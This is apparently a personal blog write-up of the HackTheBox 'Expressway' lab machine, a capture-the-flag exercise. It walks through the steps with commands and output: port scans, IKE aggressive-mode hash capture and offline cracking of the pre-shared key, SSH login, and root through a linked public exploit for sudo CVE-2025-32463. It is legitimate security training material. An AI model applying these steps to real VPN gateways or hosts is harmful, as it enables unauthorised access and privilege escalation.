🌟 wither's blog

Expressway

📅 Last Updated: Sep 21, 2025 11:55 | 📄 Size: 8.6 KB | 🎯 Type: HackTheBox Writeup | 🎚️ Difficulty: Easy | 🔗 Back to Categories

Nmap

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ nmap -sC -sV -Pn 10.129.242.213 -oN ./nmap.txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Except for TCP 22 port, no other ports are open, which means we must check the UDP service.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ sudo nmap -sS -sU -p U:1-1024 -T4 10.129.242.213
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 21:00 UTC

To be honest, using nmapto scan the udp service is not first choice, in this place, we can use udpxto help us do that https://github.com/nullt3r/udpx

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ udpx -t 10.129.242.213 -c 128 -w 1000             

        __  ______  ____ _  __
       / / / / __ \/ __ \ |/ /
      / / / / / / / /_/ /   / 
     / /_/ / /_/ / ____/   |  
     \____/_____/_/   /_/|_|  
         v1.0.7, by @nullt3r

2025/09/21 21:24:51 [+] Starting UDP scan on 1 target(s)
2025/09/21 21:24:51 [*] 10.129.13.112:500 (ike)
2025/09/21 21:25:52 [+] Scan completed

We can find something interesting about udp port 500 service

IKE

  1. What is IKE?
Full name: Internet Key Exchange.
Purpose: Used to establish and manage security associations (SAs) for IPSec VPNs.
Protocol: Operates on UDP port 500 (UDP 4500 is sometimes used).
Functions:
Bilateral authentication (can use pre-shared keys, certificates, Kerberos, etc.).
Negotiates encryption algorithms, hash algorithms, and Diffie-Hellman groups.
Generates session keys for subsequent data encryption.

To help us scan this service, we can try to use ike-scanto help us do that

$ sudo ike-scan expressway.htb

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112  Main Mode Handshake returned HDR=(CKY-R=1d432c635a2e8d64) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Then we can continue to use aggressive mode to help us do more about leaking

$ sudo ike-scan -A expressway.htb

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112  Aggressive Mode Handshake returned HDR=(CKY-R=10f501450cedfb8e) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Use -P to generate PSK cracking parameters

$ ike-scan -h
--pskcrack[=<f>] or -P[<f>] Crack aggressive mode pre-shared keys.
                        This option outputs the aggressive mode pre-shared key
                        (PSK) parameters for offline cracking using the
                        "psk-crack" program that is supplied with ike-scan.
                        You can optionally specify a filename, <f>, to write
                        the PSK parameters to.  If you do not specify a filename
                        then the PSK parameters are written to standard output.
                        If you are using the short form of the option (-P)
                        then the value must immediately follow the option
                        letter with no spaces, e.g. -Pfile not -P file.
                        You can only specify a single target host if you use
                        this option.
                        This option is only applicable to IKE aggressive mode.

$ sudo ike-scan -A expressway.htb --id=ike@expressway.htb -Pike.psk
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.13.112  Aggressive Mode Handshake returned HDR=(CKY-R=8408e5d22149f23f) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

$ tail ike.psk
bc859f8dc4a9e13eb9005f4c8837adcc1d9ae7a994f101f02a655305fa74f5b3749c13b308743811c37896b8ba1632058983ecd64a6da01ea8a780b45e31d486880c68028720cad28e5c341cf9cd9fc2a4d0cc05fd774937b43fb3186a0cd91dfab698c8643b1b693f20782a86db22aaa96a35bdf260fee61ae4488b04e96a2c:6c4ccc2b450929e68527c985be032635a885ce002b21ae9785424e55d3462b1d4898724e751ce9f111c994152f627699caba4e0d7b80b13a94841f1515fe6bd3fbe3ea13193abfde73c260a9d98bfdcaa1cf0c4763f27a23ac9e6368ec64cca68128f48b5fa62b91acdf44d088653841d3cc3d00707823c6e061d199bba30de7:8408e5d22149f23f:02df802fb6f5df66:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:9c4cb226f57fc96bcfee3b78bfe92ab2463b982e:aec8b6a180a4f3d9293c483b9705c9df35e01f24486b2b2f3e8774a6019e6bfd:9157243c333a25d603bf588a5c8a9c0bc966e3b0

Then we can use psk-crackto help us crack this secret

$ psk-crack -d ~/wordlists/rockyou.txt ike.psk

Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 9157243c333a25d603bf588a5c8a9c0bc966e3b0
Ending psk-crack: 8045039 iterations in 4.278 seconds (1880409.57 iterations/sec)

We can use this credit ike:freakingrockstarontheroadto ssh connect the machine

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Expressway]
└─$ ssh ike@expressway.htb
The authenticity of host 'expressway.htb (10.129.242.213)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password: 
Last login: Wed Sep 17 12:19:40 BST 2025 from 10.10.14.64 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 21 12:37:37 2025 from 10.10.14.19
ike@expressway:~$

Privilege escalation

Firstly, I would check idand sudo -l

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password: 
Sorry, user ike may not run sudo on expressway.

We found ikeaccount is in the group proxy, and this rejection message does not seem to be the default one. I would verify the binary file

ike@expressway:~$ which sudo
/usr/local/bin/sudo

ike@expressway:~$ ls -lh /usr/local/bin/sudo
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo

Obviously, the real default sudo command path is replaced here.

ike@expressway:~$ file /usr/bin/sudo
/usr/bin/sudo: setuid ELF 64-bit LSB pie executable, ..., stripped

ike@expressway:~$ file /usr/local/bin/sudo
/usr/local/bin/sudo: setuid ELF 64-bit LSB pie executable, ..., with debug_info, not stripped

Now that we have found the path, we can try to check the version of sudo

ike@expressway:~$ /usr/bin/sudo -V
Sudo version 1.9.13p3
Sudoers policy plugin version 1.9.13p3
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.13p3
Sudoers audit plugin version 1.9.13p3

In this place, we have know a very famous new CVE-2025-32463

Sudo chroot 1.9.17 - Local Privilege Escalation

The version in this machine is vulnerable here https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/blob/main/sudo-chwoot.sh

So we can just run the script and get the root shell here

ike@expressway:~$ bash sudo-chwoot.sh 
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)

Description

Overall it's a pretty boring machine that uses a lot of CTF techniques and is a bit too hard coded.